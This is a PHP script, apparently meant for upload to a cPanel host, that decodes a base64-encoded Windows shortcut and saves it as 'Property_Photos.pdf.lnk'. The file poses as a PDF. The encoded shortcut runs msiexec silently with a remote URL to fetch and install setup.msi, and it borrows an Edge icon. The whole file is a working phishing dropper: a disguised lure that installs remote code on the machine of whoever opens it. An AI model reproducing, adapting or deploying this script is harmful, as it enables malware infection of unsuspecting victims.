<?php
// Upload this to CPanel, then access it via browser
// It creates the actual .lnk file from a base64 string

// First, generate your LNK locally and base64 encode it:
// base64 Property_Photos.pdf.lnk > lnk_b64.txt

// Paste the contents of lnk_b64.txt here:
$b64 = "TAAAAAEUAgAAAAAAwAAAAAAAAEbjAAAAAAAAAICJ8ngB2NwBgInyeAHY3AGAifJ4AdjcAQAAAAAN
AAAAAQAAAAAAAAAAAAAAAAAAAPcAFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAA
AAAAAAAAAAAAPAAxAABAAACaXOZTEABXaW5kb3dzACYAAwAEAO++qFLzCJpc5lMUAAAAVwBpAG4A
ZABvAHcAcwAAABYAQAAxAAAAEACTXOh7EABTeXN0ZW0zMgAAKAADAAQA776oUvMIk1zoexQAAABT
AHkAcwB0AGUAbQAzADIAAAAYAEwAMgAAYAEAZlx1qhAAbXNpZXhlYy5leGUuAAAwAAMABADvvmZc
dapmXHWqFAAAAG0AcwBpAGUAeABlAGMALgBlAHgAZQAuAAAAHAAAAE8AAAAcAAAAAQAAABwAAAAt
AAAAAAAAAE4AAAARAAAAAwAAAKVOB6gQAAAAAEM6XFdpbmRvd3NcU3lzdGVtMzJcbXNpZXhlYy5l
eGUuAAAvAC8AcQAgAC8AaQAgACIAaAB0AHQAcABzADoALwAvAG4AZQBjAHMAYQBrAGUAbgB5AGEA
LgBvAHIAZwAvAGEAcwBzAGUAdABzAC8AcwBlAHQAdQBwAC4AbQBzAGkAIgA5ACUAUAByAG8AZwBy
AGEAbQBGAGkAbABlAHMAKAB4ADgANgApACUAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUA
XABBAHAAcABsAGkAYwBhAHQAaQBvAG4AXABtAHMAZQBkAGcAZQAuAGUAeABlAAAAAAA="; 

file_put_contents("Property_Photos.pdf.lnk", base64_decode($b64));
echo "LNK file created: " . filesize("Property_Photos.pdf.lnk") . " bytes";
?>